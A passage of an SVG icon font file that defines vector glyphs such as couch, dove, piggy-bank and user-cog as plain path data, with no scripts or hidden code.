c-1.2998 3 -0.700195 6.40039 1.5 8.7002c0.5 0.599609 42.2002 45.5 54.7998 95.7998c-35.5996 35.7002 -57 81.1006 -57 130.7zM633.8 -10.0996c7 -5.40039 8.2998 -15.5 2.90039 -22.3008l-19.6006 -25.2998c-5.5 -7 -15.5 -8.2002 -22.5 -2.7998l-588.399 454.7
c-7 5.39941 -8.2002 15.3994 -2.7998 22.3994l19.5996 25.2002c5.5 7 15.5 8.2002 22.5 2.7998l105.1 -81.2998c45.2002 32.6006 104.301 52.7002 169.4 52.7002c141.4 0 256 -93.0996 256 -208c0 -49.2002 -21.4004 -94.0996 -56.5996 -129.7z" />
    <glyph glyph-name="couch" unicode="&#xf4b8;" horiz-adv-x="640" 
d="M160 224c0 35.2998 -28.7002 64 -64 64h-32c0 53 43 96 96 96h320c53 0 96 -43 96 -96h-32c-35.2998 0 -64 -28.7002 -64 -64v-64h-320v64zM576 256c35.2998 0 64 -28.7002 64 -64c0 -23.5996 -13 -44 -32 -55.0996v-120.9c0 -8.7998 -7.2002 -16 -16 -16h-64
c-8.7998 0 -16 7.2002 -16 16v16h-384v-16c0 -8.7998 -7.2002 -16 -16 -16h-64c-8.7998 0 -16 7.2002 -16 16v120.9c-19 11.0996 -32 31.5 -32 55.0996c0 35.2998 28.7002 64 64 64h32c17.7002 0 32 -14.2998 32 -32v-96h384v96c0 17.7002 14.2998 32 32 32h32z" />
    <glyph glyph-name="donate" unicode="&#xf4b9;" 
d="M256 32c-114.9 0 -208 93.0996 -208 208s93.0996 208 208 208s208 -93.0996 208 -208s-93.0996 -208 -208 -208zM233.8 350.6c-32.7002 -0.899414 -59 -28.3994 -59.0996 -62.3994c0 -27.7002 18 -52.4004 43.7002 -60.1006l62.2998 -18.6992
c7.09961 -2.10059 12.0996 -9.40039 12.0996 -17.6006c0 -10.0996 -7.2998 -18.2998 -16.2998 -18.2998h-38.9004c-6.39941 0 -12.3994 1.7002 -17.7998 5.09961c-4.5 2.80078 -10.2002 2.7002 -14 -1l-16.2998 -15.5c-5 -4.7998 -4.40039 -13 1.2002 -17.0996
c12.5 -9.2998 27.5 -14.5996 43 -15.4004v-17c0 -9.19922 7.39941 -16.5996 16.5996 -16.5996h11.1006c9.19922 0 16.5996 7.40039 16.5996 16.5996v16.8008c32.7002 0.899414 59.0996 28.3994 59.0996 62.3994c0 27.7002 -18 52.4004 -43.6992 60.1006l-62.3008 18.6992
c-7.09961 2.10059 -12.0996 9.40039 -12.0996 17.6006c0 10.0996 7.2998 18.2998 16.2998 18.2998h38.9004c6.39941 0 12.3994 -1.7002 17.7998 -5.09961c4.5 -2.80078 10.2002 -2.7002 14 1l16.2998 15.5c5 4.7998 4.40039 13 -1.2002 17.0996
c-12.5 9.2998 -27.5 14.5996 -43 15.4004v17c0 9.19922 -7.39941 16.5996 -16.5996 16.5996h-11.0996c-9.2002 0 -16.6006 -7.40039 -16.6006 -16.5996v-16.8008zM480 96c17.7002 0 32 -14.2998 32 -32v-96c0 -17.7002 -14.2998 -32 -32 -32h-448
c-17.7002 0 -32 14.2998 -32 32v96c0 17.7002 14.2998 32 32 32h32.4004c19.6992 -26 44.5996 -47.7002 73 -64h-63.8008c-5.2998 0 -9.59961 -3.59961 -9.59961 -8v-16c0 -4.40039 4.2998 -8 9.59961 -8h364.7c5.2998 0 9.60059 3.59961 9.60059 8v16
c0 4.40039 -4.30078 8 -9.60059 8h-63.7998c28.4004 16.2998 53.4004 38 73 64h32.5z" />
    <glyph glyph-name="dove" unicode="&#xf4ba;" 
d="M288 280.8c-50.7998 10.5 -96.5996 36.7998 -130.8 75.1006c11.2002 32.3994 27.7998 61.5996 48.8994 86.5c8.80078 10.5 25.7002 5.19922 27.8008 -8.30078c7 -45.8994 25.8994 -88.8994 54.0996 -125.199v-28.1006zM400 384h112l-32 -64v-160.1
c0 -88.4004 -71.5996 -159.9 -160 -159.9h-76.9004l-65.1992 -56.0996c-6.10059 -5.30078 -14.1006 -8.2002 -22.1006 -7.90039c-92.7998 3.7998 -135.8 49.4004 -153.2 76.2998c-6 9.2998 -1.19922 21.7002 9.5 24.4004l143.9 36
c-12.7998 9.59961 -25.7002 20.0996 -38.9004 32.7998c-51 49 -85.0996 115.1 -85.0996 185.9c0 41.3994 9.40039 80.5996 26 115.699c5.7998 12.3008 23.5 11.6006 29 -0.899414c40 -91.2002 128.6 -155.5 233 -161.7v59.4004c0 44.1992 35.7998 80.0996 80 80.0996z
M400 287.9c8.7998 0 16 7.19922 16 16c0 8.7998 -7.2002 16 -16 16s-16 -7.2002 -16 -16c0 -8.80078 7.2002 -16 16 -16z" />
    <glyph glyph-name="hand-holding" unicode="&#xf4bd;" horiz-adv-x="576" 
d="M565.3 119.9c15.1006 -13.6006 13.9004 -36.8008 -1.2998 -48.9004l-151.2 -121c-11.3994 -9.09961 -25.5 -14 -40 -14h-356.8c-8.7998 0 -16 7.2002 -16 16v96c0 8.7998 7.2002 16 16 16h55.4004l46.5 37.7002c21 17 47.0996 26.2998 74.0996 26.2998h160
c19.5 0 34.9004 -17.4004 31.5996 -37.4004c-2.59961 -15.6992 -17.3994 -26.5996 -33.2998 -26.5996h-78.2998c-8.7998 0 -16 -7.2002 -16 -16s7.2002 -16 16 -16h118.3c14.6006 0 28.7002 4.90039 40 14l92.4004 73.9004c12.3994 10 30.7998 10.6992 42.5996 0z" />
    <glyph glyph-name="hand-holding-heart" unicode="&#xf4be;" horiz-adv-x="576" 
d="M275.3 197.5l-108.899 114.2c-31.6006 33.2002 -29.7002 88.2002 5.59961 118.8c30.7998 26.7002 76.7002 21.9004 104.9 -7.7998l11.0996 -11.6006l11.2002 11.7002c28.2002 29.6006 74.0996 34.4004 104.899 7.7002c35.4004 -30.5996 37.2002 -85.5996 5.60059 -118.8
l-108.9 -114.2c-7.09961 -7.40039 -18.5 -7.40039 -25.5 0zM565.3 119.9c15.1006 -13.6006 13.9004 -36.8008 -1.2998 -48.9004l-151.2 -121c-11.3994 -9.09961 -25.5 -14 -40 -14h-356.8c-8.7998 0 -16 7.2002 -16 16v96c0 8.7998 7.2002 16 16 16h55.4004l46.5 37.7002
c21 17 47.0996 26.2998 74.0996 26.2998h160c19.5 0 34.9004 -17.4004 31.5996 -37.4004c-2.59961 -15.6992 -17.3994 -26.5996 -33.2998 -26.5996h-78.2998c-8.7998 0 -16 -7.2002 -16 -16s7.2002 -16 16 -16h118.3c14.6006 0 28.7002 4.90039 40 14l92.4004 73.9004
c12.3994 10 30.7998 10.6992 42.5996 0z" />
    <glyph glyph-name="hand-holding-usd" unicode="&#xf4c0;" horiz-adv-x="543" 
d="M257.6 303.7c-22.1992 6.39941 -40 24.7002 -42.8994 47.7002c-4 32 19 59.3994 49.2998 63v17.5996c0 8.7998 7.2002 16 16 16h16c8.7998 0 16 -7.2002 16 -16v-17.7002c11.5 -1.39941 22.2998 -5.2002 31.7998 -11.5c6.2002 -4.09961 6.7998 -13.0996 1.5 -18.3994
l-17.5 -17.5c-3.7002 -3.7002 -9.2998 -4.2002 -14.0996 -2c-3.2002 1.39941 -6.7002 2.19922 -10.2998 2.19922h-32.8008c-4.59961 0 -8.39941 -3.7998 -8.39941 -8.39941c0 -3.7002 2.5 -7.10059 6.09961 -8.10059l50 -14.2998
c22.2002 -6.39941 40 -24.7002 42.9004 -47.7002c4 -32 -19 -59.3994 -49.2998 -63v-17.5996c0 -8.7998 -7.2002 -16 -16 -16h-16c-8.80078 0 -16 7.2002 -16 16v17.7002c-11.5 1.39941 -22.3008 5.2002 -31.8008 11.5c-6.19922 4.09961 -6.7998 13.0996 -1.5 18.3994
l17.5 17.5c3.7002 3.7002 9.30078 4.2002 14.1006 2c3.2002 -1.39941 6.7002 -2.19922 10.2998 -2.19922h32.7998c4.60059 0 8.40039 3.7998 8.40039 8.39941c0 3.7002 -2.5 7.10059 -6.10059 8.10059zM533.9 119.9c14.1992 -13.6006 13.0996 -36.8008 -1.30078 -48.9004
l-142.8 -121c-10.7998 -9.09961 -24.0996 -14 -37.7998 -14h-336.9c-8.2998 0 -15.0996 7.2002 -15.0996 16v96c0 8.7998 6.7998 16 15.0996 16h52.4004l43.9004 37.7002c19.6992 17 44.3994 26.2998 69.8994 26.2998h151.101c18.2998 0 32.8994 -17.4004 29.7998 -37.4004
c-2.40039 -15.6992 -16.2998 -26.5996 -31.4004 -26.5996h-73.8994c-8.30078 0 -15.1006 -7.2002 -15.1006 -16s6.7998 -16 15.1006 -16h111.699c13.8008 0 27.1006 4.90039 37.8008 14l87.1992 73.9004c11.8008 10 29.1006 10.6992 40.3008 0z" />
    <glyph glyph-name="hands" unicode="&#xf4c2;" horiz-adv-x="640" 
d="M204.8 217.6l57.6006 -76.7998c16.5996 -22.2002 25.5996 -49.0996 25.5996 -76.7998v-112c0 -8.7998 -7.2002 -16 -16 -16h-131.7c-7.2002 0 -13.5 4.7002 -15.2998 11.5996c-2 7.80078 -5.40039 15.2002 -10.4004 21.7002l-104.1 134.3
c-6.7998 8.5 -10.5 19.1006 -10.5 30v218.4c0 17.7002 14.2998 32 32 32s32 -14.2998 32 -32v-148.4l89.7998 -107.8c6 -7.2998 16.9004 -7.7998 23.6006 -1.09961l12.7998 12.7998c5.59961 5.59961 6.2998 14.5 1.5 20.9004l-38.1006 50.7998
c-10.5996 14.0996 -7.69922 34.2002 6.40039 44.7998s34.2002 7.7002 44.7998 -6.40039zM608 384c17.7002 0 32 -14.2998 32 -32v-218.4c0 -10.8994 -3.7002 -21.5 -10.5 -30l-104.1 -134.3c-5 -6.5 -8.40039 -13.8994 -10.4004 -21.7002
c-1.7998 -6.89941 -8.2002 -11.5996 -15.2998 -11.5996h-131.7c-8.7998 0 -16 7.2002 -16 16v112c0 27.7002 9 54.5996 25.5996 76.7998l57.6006 76.7998c10.5996 14.1006 30.7002 17 44.7998 6.40039s17 -30.7002 6.40039 -44.7998l-38.1006 -50.7998
c-4.7998 -6.40039 -4.09961 -15.3008 1.5 -20.9004l12.7998 -12.7998c6.60059 -6.60059 17.6006 -6.10059 23.6006 1.09961l89.7998 107.8v148.4c0 17.7002 14.2998 32 32 32z" />
    <glyph glyph-name="hands-helping" unicode="&#xf4c4;" horiz-adv-x="640" 
d="M488 256c13.2998 0 24 -10.7002 24 -24v-48c0 -13.2998 -10.7002 -24 -24 -24h-8v-64c0 -17.7002 -14.2998 -32 -32 -32h-16c0 -35.2998 -28.7002 -64 -64 -64h-136.6l-103.4 -59.7002c-15.2998 -8.7998 -34.9004 -3.59961 -43.7002 11.7002l-80 138.6
c-8.89941 15.3008 -3.59961 34.9004 11.7002 43.7002l80 46.2002v47.2998c0 22.4004 11.7998 43.2998 31.0996 54.7998l64.9004 39v-121.6c0 -39.7002 32.2998 -72 72 -72s72 32.2998 72 72v56h152zM635.7 293.4c8.7998 -15.3008 3.59961 -34.8008 -11.7002 -43.7002
l-80 -46.2002v28.5c0 30.9004 -25.0996 56 -56 56h-184v-88c0 -22.0996 -17.9004 -40 -40 -40s-40 17.9004 -40 40v126.3c0 11 5.59961 21.2998 15 27.1006l33.5 20.8994c10.2002 6.2998 21.9004 9.7002 33.9004 9.7002h102.199l103.4 59.7002
c15.2998 8.7998 34.9004 3.59961 43.7002 -11.7002z" />
    <glyph glyph-name="parachute-box" unicode="&#xf4cd;" 
d="M511.9 273c1.09961 -9.2002 -6.80078 -17 -16.1006 -17h-8.7002l-136.8 -151.9c0.700195 -2.69922 1.60059 -5.19922 1.60059 -8.09961v-128c0 -17.7002 -14.3008 -32 -32 -32h-128c-17.7002 0 -32 14.2998 -32 32v128c0 2.90039 0.899414 5.5 1.59961 8.09961
l-136.7 151.9h-8.7002c-9.19922 0 -17.0996 7.90039 -16 17c9.10059 75.5 78.4004 132.3 158.301 158.7c-36.4004 -39.4004 -62.4004 -100.601 -62.4004 -175.7h-28.0996l116.6 -129.5c2.5 0.599609 4.7998 1.5 7.5 1.5h48v128h-112c0 115.2 68.9004 192 128 192
s128 -76.7998 128 -192h-112v-128h48c2.7002 0 5 -0.900391 7.5 -1.5l116.6 129.5h-28.0996c0 75.0996 -26 136.3 -62.4004 175.7c79.9004 -26.2998 149.2 -83.1006 158.301 -158.7z" />
    <glyph glyph-name="people-carry" unicode="&#xf4ce;" horiz-adv-x="640" 
d="M128 352c-26.5 0 -48 21.5 -48 48s21.5 48 48 48s48 -21.5 48 -48s-21.5 -48 -48 -48zM512 352c-26.5 0 -48 21.5 -48 48s21.5 48 48 48s48 -21.5 48 -48s-21.5 -48 -48 -48zM637.7 -20.0996c6.59961 -16.4004 -1.40039 -35 -17.7998 -41.6006
c-3.90039 -1.59961 -7.90039 -2.2998 -11.9004 -2.2998c-12.7002 0 -24.7002 7.59961 -29.7002 20.0996l-27.7002 69.2002l2 18.2002l41.1006 46.4004zM603.5 189.7c4.59961 -20 -0.799805 -41.2002 -14.4004 -56.7002l-67.1992 -75.9004l-10.1006 -92.5996
c-1.7998 -16.4004 -15.7002 -28.5 -31.7998 -28.5c-1.2002 0 -2.2998 0.0996094 -3.5 0.200195c-17.5 1.89941 -30.2002 17.7002 -28.2998 35.2998l10.0996 92.7998c1.5 13 6.90039 25.1006 15.6006 35l43.2998 49l-17.6006 70.2998l-6.7998 -20.3994
c-4.09961 -12.6006 -11.8994 -23.4004 -24.5 -32.6006l-51.0996 -32.5c-4.60059 -2.89941 -12.1006 -4.59961 -17.2002 -5h-160c-5.09961 0.400391 -12.5996 2.10059 -17.2002 5l-51.0996 32.5c-12.6006 9.2002 -20.4004 20.1006 -24.5 32.6006l-6.7998 20.3994
l-17.6006 -70.2998l43.2998 -49c8.7002 -9.89941 14.1006 -22 15.6006 -35l10.0996 -92.7998c1.90039 -17.5996 -10.7002 -33.4004 -28.2998 -35.2998c-1.2002 -0.100586 -2.2998 -0.200195 -3.5 -0.200195c-16.2002 0 -30 12.2002 -31.7998 28.5l-10.1006 92.5996
l-67.1992 75.9004c-13.7002 15.5 -19 36.7002 -14.4004 56.7002l18.4004 80.2002c4.59961 20 18.5996 36.7998 37.5 44.8994c18.5 8 38.8994 6.7002 56.0996 -3.2998c22.7002 -13.4004 39.7998 -34.4004 48.0996 -59.4004l11.3008 -33.8994l16.0996 -10.2002v96
c0 8.7998 7.2002 16 16 16h160c8.7998 0 16 -7.2002 16 -16v-96l16 10.2002l11.2998 33.8994c8.40039 24.9004 25.4004 46 48.1006 59.4004c17.0996 10 37.5996 11.2998 56.0996 3.2998c18.9004 -8.09961 32.9004 -24.8994 37.5 -44.8994zM46.2998 89.9004l41.1006 -46.4004
l2 -18.2002l-27.7002 -69.2002c-6.5 -16.0996 -24.7998 -24.3994 -41.6006 -17.7998c-16.3994 6.60059 -24.3994 25.2002 -17.7998 41.6006z" />
    <glyph glyph-name="piggy-bank" unicode="&#xf4d3;" horiz-adv-x="576" 
d="M560 224c8.7998 0 16 -7.2002 16 -16v-128c0 -8.7998 -7.2002 -16 -16 -16h-48.7002c-9 -11.9004 -19.5 -22.4004 -31.2998 -31.2998v-80.7002c0 -8.7998 -7.2002 -16 -16 -16h-64c-8.7998 0 -16 7.2002 -16 16v48h-128v-48c0 -8.7998 -7.2002 -16 -16 -16h-64
c-8.7998 0 -16 7.2002 -16 16v80.7002c-38.5996 29.2002 -64 75.0996 -64 127.3h-40c-33.2998 0 -59.9004 29.2002 -55.5 63.4004c3.59961 28.1992 29 48.5996 57.5 48.5996c3.2998 0 6 -2.7002 6 -6v-20c0 -3.2998 -2.7002 -6 -6 -6h-1
c-11.5996 0 -22.2998 -7.7998 -24.5 -19.2002c-3 -15.2998 8.7002 -28.7998 23.5 -28.7998h43.2002c14.8994 73 79.3994 128 156.8 128h128c7.90039 0 15.4004 -1.2002 23 -2.2998c17.5996 20.7998 43.5996 34.2998 73 34.2998h32l-18.9004 -75.5
c15.8008 -14.7998 28.6006 -32.5 37.4004 -52.5h29.5zM432 160c8.7998 0 16 7.2002 16 16s-7.2002 16 -16 16s-16 -7.2002 -16 -16s7.2002 -16 16 -16zM256 352c-16.4004 0 -32.2002 -2.2998 -47.4004 -6.2002c-0.0996094 2.10059 -0.599609 4.10059 -0.599609 6.2002
c0 53 43 96 96 96s96 -43 96 -96c0 -0.299805 -0.0996094 -0.5 -0.0996094 -0.799805c-5.2002 0.399414 -10.5 0.799805 -15.9004 0.799805h-128z" />
    <glyph glyph-name="ribbon" unicode="&#xf4d6;" horiz-adv-x="448" 
d="M6.09961 3.7002l117.2 130l79.2002 -87.9004l-91.7998 -101.899c-8 -8.80078 -21.4004 -10.5 -31.2998 -3.80078l-68.8008 27.9004c-12 8.09961 -14.0996 24.9004 -4.5 35.7002zM441.9 3.7002c9.69922 -10.7998 7.59961 -27.6006 -4.30078 -35.6006l-68.7998 -27.8994
c-9.89941 -6.7002 -23.2998 -5.10059 -31.2998 3.7998l-248.1 275.3c-48.6006 53.7998 -13 113.5 -11.5 116l43.5996 73.2002c4.2998 7.2002 9.90039 13.2998 16.7998 18c44 29.7002 130.7 27.5996 171.4 0c6.89941 -4.7002 12.5 -10.7998 16.7998 -18l43.7002 -73.5
c21.8994 -36.9004 17.2998 -83.5996 -11.4004 -115.5l-34.2002 -38l-79.0996 87.7002s52.7002 59 56 64.5996c-15.4004 8.40039 -40.2002 17.9004 -77.5 17.9004s-62.0996 -9.5 -77.5 -17.9004c3.40039 -5.5 295.4 -330.1 295.4 -330.1z" />
    <glyph glyph-name="route" unicode="&#xf4d7;" 
d="M416 128c52.9004 0 96 -43.0996 96 -96s-43.0996 -96 -96 -96h-277.8c13.5 16.2998 31.2998 39.2002 47.2998 64h230.5c17.5996 0 32 14.4004 32 32s-14.4004 32 -32 32h-96c-52.9004 0 -96 43.0996 -96 96s43.0996 96 96 96h45.2998
c-23.0996 32.5996 -45.2998 70.5 -45.2998 96c0 53 43 96 96 96s96 -43 96 -96s-96 -160 -96 -160h-96c-17.5996 0 -32 -14.4004 -32 -32s14.4004 -32 32 -32h96zM416 384c-17.7002 0 -32 -14.2998 -32 -32s14.2998 -32 32 -32s32 14.2998 32 32s-14.2998 32 -32 32zM96 192
c53 0 96 -43 96 -96s-96 -160 -96 -160s-96 107 -96 160s43 96 96 96zM96 64c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32z" />
    <glyph glyph-name="seedling" unicode="&#xf4d8;" 
d="M64 352c123.7 0 224 -100.3 224 -224v-144c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v144c-123.7 0 -224 100.3 -224 224h64zM448 416h64c0 -115.9 -88 -211.1 -200.7 -222.8c-10.7998 40.7002 -31.2998 77.3994 -59 107.6
c38.2998 68.7002 111.5 115.2 195.7 115.2z" />
    <glyph glyph-name="sign" unicode="&#xf4d9;" 
d="M496 384c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-368v-368c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v368h-48c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h48v48c0 8.7998 7.2002 16 16 16h32
c8.7998 0 16 -7.2002 16 -16v-48h368zM160 64v224h320v-224h-320z" />
    <glyph glyph-name="smile-wink" unicode="&#xf4da;" horiz-adv-x="496" 
d="M0 192c0 137 111 248 248 248s248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248zM200 240c0 17.7002 -14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32s32 14.2998 32 32zM358.5 223.5l9.7002 -8.5c8.39941 -7.5 21.5 -0.299805 19.7998 10.7998
c-4 25.2002 -34.2002 42.1006 -59.9004 42.1006c-25.6992 0 -55.8994 -16.9004 -59.8994 -42.1006c-1.7998 -11.2002 11.5 -18.2002 19.7998 -10.7998l9.5 8.5c14.7998 13.2002 46.2002 13.2002 61 0zM157.8 122.2c-13.3994 16.2998 -38.0996 -4.10059 -24.5996 -20.4004
c28.5 -34.2002 70.2998 -53.7998 114.8 -53.7998s86.2998 19.5996 114.8 53.7002c13.5 16.2998 -11 36.7002 -24.5996 20.5c-22.4004 -26.7998 -55.2002 -42.2002 -90.2002 -42.2002s-67.7998 15.2998 -90.2002 42.2002z" />
    <glyph glyph-name="tape" unicode="&#xf4db;" horiz-adv-x="640" 
d="M224 256c35.2998 0 64 -28.7002 64 -64s-28.7002 -64 -64 -64s-64 28.7002 -64 64s28.7002 64 64 64zM624 32c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-400c-123.7 0 -224 100.3 -224 224s100.3 224 224 224s224 -100.3 224 -224
c0 -62.7002 -25.9004 -119.3 -67.4004 -160h243.4zM224 96c53 0 96 43 96 96s-43 96 -96 96s-96 -43 -96 -96s43 -96 96 -96z" />
    <glyph glyph-name="truck-loading" unicode="&#xf4de;" horiz-adv-x="640" 
d="M50.2002 72.4004l-49.6006 185.5c-2.2998 8.5 2.80078 17.2998 11.3008 19.5996l77.2998 20.7002l24.7998 -92.7002l61.7998 16.5l-24.7998 92.7002l77.2002 20.7998c8.5 2.2998 17.2998 -2.7998 19.5996 -11.2998l49.7002 -185.5
c2.2998 -8.5 -2.7998 -17.2998 -11.2998 -19.6006l-216.4 -58c-8.5 -2.2998 -17.2998 2.80078 -19.5996 11.3008zM384 448h256v-400c0 -61.9004 -50.0996 -112 -112 -112c-60.4004 0 -109.2 47.9004 -111.6 107.7l-393.7 -107.4
c-4.2002 -1.2002 -8.60059 1.2998 -9.7998 5.60059l-12.6006 46.2998c-1.2002 4.2002 1.2998 8.59961 5.60059 9.7998l346.1 94.4004v323.6c0 17.7002 14.2998 32 32 32zM528 0c26.5 0 48 21.5 48 48s-21.5 48 -48 48s-48 -21.5 -48 -48s21.5 -48 48 -48z" />
    <glyph glyph-name="truck-moving" unicode="&#xf4df;" horiz-adv-x="640" 
d="M621.3 210.7c12 -12 18.7002 -28.2002 18.7002 -45.2002v-85.5c0 -8.7998 -7.2002 -16 -16 -16h-17.5996c1 -5.2002 1.59961 -10.5 1.59961 -16c0 -44.2002 -35.7998 -80 -80 -80s-80 35.7998 -80 80c0 5.5 0.5 10.7998 1.59961 16h-163.199
c1 -5.2002 1.59961 -10.5 1.59961 -16c0 -44.2002 -35.7998 -80 -80 -80c-26.2998 0 -49.4004 12.7998 -64 32.4004c-14.5996 -19.5 -37.7002 -32.4004 -64 -32.4004c-44.2002 0 -80 35.7998 -80 80v336c0 17.7002 14.2998 32 32 32h416c17.7002 0 32 -14.2998 32 -32
v-96.0996h37.5c17 0 33.2998 -6.7002 45.2998 -18.7002zM80 16c17.5996 0 32 14.4004 32 32s-14.4004 32 -32 32s-32 -14.4004 -32 -32s14.4004 -32 32 -32zM208 16c17.5996 0 32 14.4004 32 32s-14.4004 32 -32 32s-32 -14.4004 -32 -32s14.4004 -32 32 -32zM480 240v-48
h92.0996l-43.2998 43.2998c-3 3 -7 4.7002 -11.2998 4.7002h-37.5zM528 16c17.5996 0 32 14.4004 32 32s-14.4004 32 -32 32s-32 -14.4004 -32 -32s14.4004 -32 32 -32z" />
    <glyph glyph-name="video-slash" unicode="&#xf4e2;" horiz-adv-x="640" 
d="M633.8 -10.0996c7 -5.40039 8.2998 -15.5 2.7998 -22.4004l-19.5996 -25.2998c-5.5 -7 -15.5 -8.2002 -22.5 -2.7998l-178.5 138l-373.3 288.6l-36.5 28.2002c-7 5.39941 -8.2002 15.3994 -2.7998 22.3994l19.5996 25.2002c5.5 7 15.5 8.2002 22.5 2.7998
l78.4004 -60.5996h244.3c26.3994 0 47.7998 -21.4004 47.7998 -47.7998v-178l32 -24.7002v137.2l109.6 75.5996c21.3008 14.6006 50.4004 -0.299805 50.4004 -25.7998v-257c0 -17.4004 -13.7998 -29.7002 -29.2002 -31.0996zM32 47.7998v245.5l365.8 -282.8
c-8.2002 -6.5 -18.3994 -10.5 -29.5996 -10.5h-288.4c-26.3994 0 -47.7998 21.4004 -47.7998 47.7998z" />
    <glyph glyph-name="wine-glass" unicode="&#xf4e3;" horiz-adv-x="288" 
d="M216 -16c22.0898 0 40 -17.9102 40 -40c0 -4.41992 -3.58008 -8 -8 -8h-208c-4.41992 0 -8 3.58008 -8 8c0 22.0898 17.9102 40 40 40h40v117.18c-68.4697 15.8906 -118.05 79.9102 -111.4 154.16l15.96 178.11c0.730469 8.24023 7.55078 14.5498 15.7002 14.5498h223.48
c8.16016 0 14.9697 -6.30957 15.71 -14.5498l15.9502 -178.101c6.64941 -74.25 -42.9307 -138.27 -111.4 -154.159v-117.19h40z" />
    <glyph glyph-name="user-alt-slash" unicode="&#xf4fa;" horiz-adv-x="640" 
d="M633.8 -10.0996c7 -5.40039 8.2998 -15.5 2.90039 -22.3008l-19.6006 -25.2998c-5.5 -7 -15.5 -8.2002 -22.5 -2.7998l-588.399 454.7c-7 5.39941 -8.2002 15.3994 -2.7998 22.3994l19.5996 25.2002c5.5 7 15.5 8.2002 22.5 2.7998l135.5 -104.8
c16 62.1006 71.9004 108.2 139 108.2c79.5 0 144 -64.5 144 -144c0 -54.0996 -30.2002 -100.7 -74.4004 -125.3zM198.4 128h47.3994l248.4 -192h-382.2c-26.5 0 -48 21.5 -48 48v9.59961c0 74.2002 60.2002 134.4 134.4 134.4z" />
    <glyph glyph-name="user-astronaut" unicode="&#xf4fb;" horiz-adv-x="448" 
d="M64 224c-8.7998 0 -16 7.2002 -16 16v96c0 8.7998 7.2002 16 16 16h13.5c24.7002 56.5 80.9004 96 146.5 96s121.8 -39.5 146.5 -96h13.5c8.7998 0 16 -7.2002 16 -16v-96c0 -8.7998 -7.2002 -16 -16 -16h-13.5c-24.7002 -56.5 -80.9004 -96 -146.5 -96
s-121.8 39.5 -146.5 96h-13.5zM104 312v-24c0 -53 43 -96 96 -96h48c53 0 96 43 96 96v24c0 22.0996 -21.5 40 -48 40h-144c-26.5 0 -48 -17.9004 -48 -40zM176 240l-12 36l-36 12l36 12l12 36l12 -36l36 -12l-36 -12zM327.6 126.6c67.5 -7.09961 120.4 -63.5996 120.4 -133
v-9.59961c0 -26.5 -21.5 -48 -48 -48h-80v64c0 17.7002 -14.2998 32 -32 32h-128c-17.7002 0 -32 -14.2998 -32 -32v-64h-80c-26.5 0 -48 21.5 -48 48v9.59961c0 69.4004 52.9004 125.9 120.4 133c29.8994 -19.2998 65.3994 -30.5996 103.6 -30.5996
s73.7002 11.2998 103.6 30.5996zM272 0c8.7998 0 16 -7.2002 16 -16s-7.2002 -16 -16 -16s-16 7.2002 -16 16s7.2002 16 16 16zM176 0c8.7998 0 16 -7.2002 16 -16v-48h-32v48c0 8.7998 7.2002 16 16 16z" />
    <glyph glyph-name="user-check" unicode="&#xf4fc;" horiz-adv-x="640" 
d="M224 192c-70.7002 0 -128 57.2998 -128 128s57.2998 128 128 128s128 -57.2998 128 -128s-57.2998 -128 -128 -128zM313.6 160c74.2002 0 134.4 -60.2002 134.4 -134.4v-41.5996c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v41.5996
c0 74.2002 60.2002 134.4 134.4 134.4h16.6992c22.3008 -10.2002 46.9004 -16 72.9004 -16s50.7002 5.7998 72.9004 16h16.6992zM636.6 288.4c4.60059 -4.60059 4.5 -12.1006 -0.0996094 -16.8008l-141.3 -140.199c-4.7002 -4.60059 -12.2002 -4.60059 -16.7998 0.0996094
l-81.7002 82.2998c-4.60059 4.7002 -4.60059 12.2002 0.0996094 16.7998l28.1006 27.9004c4.69922 4.59961 12.1992 4.59961 16.7998 -0.0996094l45.5 -45.8008l104.8 104c4.7002 4.60059 12.2002 4.60059 16.7998 -0.0996094z" />
    <glyph glyph-name="user-clock" unicode="&#xf4fd;" horiz-adv-x="640" 
d="M496 224c79.5996 0 144 -64.4004 144 -144s-64.4004 -144 -144 -144s-144 64.4004 -144 144s64.4004 144 144 144zM560 73.7002v12.5996c0 5.2998 -4.40039 9.7002 -9.7002 9.7002h-38.2998v54.2998c0 5.2998 -4.40039 9.7002 -9.7002 9.7002h-12.5996
c-5.2998 0 -9.7002 -4.40039 -9.7002 -9.7002v-76.5996c0 -5.2998 4.40039 -9.7002 9.7002 -9.7002h60.5996c5.2998 0 9.7002 4.40039 9.7002 9.7002zM320 80c0 -59.5 29.7998 -112.1 75.0996 -144h-347.1c-26.5 0 -48 21.5 -48 48v41.5996
c0 74.2002 60.2002 134.4 134.4 134.4h16.6992c22.3008 -10.2002 46.9004 -16 72.9004 -16s50.7002 5.7998 72.9004 16h16.6992c8.40039 0 16.6006 -1 24.6006 -2.5c-11.5 -23.4004 -18.2002 -49.7002 -18.2002 -77.5zM224 192c-70.7002 0 -128 57.2998 -128 128
s57.2998 128 128 128s128 -57.2998 128 -128s-57.2998 -128 -128 -128z" />
    <glyph glyph-name="user-cog" unicode="&#xf4fe;" horiz-adv-x="639" 
d="M610.5 74.7002l25.7998 -14.9004c2.90039 -1.7002 4.2998 -5.2002 3.2998 -8.5c-6.69922 -21.5996 -18.1992 -41.2002 -33.1992 -57.3994c-2.30078 -2.5 -6.10059 -3.10059 -9 -1.40039l-25.8008 14.9004c-10.8994 -9.30078 -23.3994 -16.5 -36.8994 -21.3008v-29.7998
c0 -3.39941 -2.40039 -6.39941 -5.7002 -7.09961c-21.2002 -4.7998 -43.9004 -5 -66.2002 0c-3.2998 0.700195 -5.7002 3.7002 -5.7002 7.09961v29.7998c-13.5 4.80078 -26 12 -36.8994 21.3008l-25.7998 -14.9004c-3 -1.7002 -6.7002 -1.09961 -9 1.40039
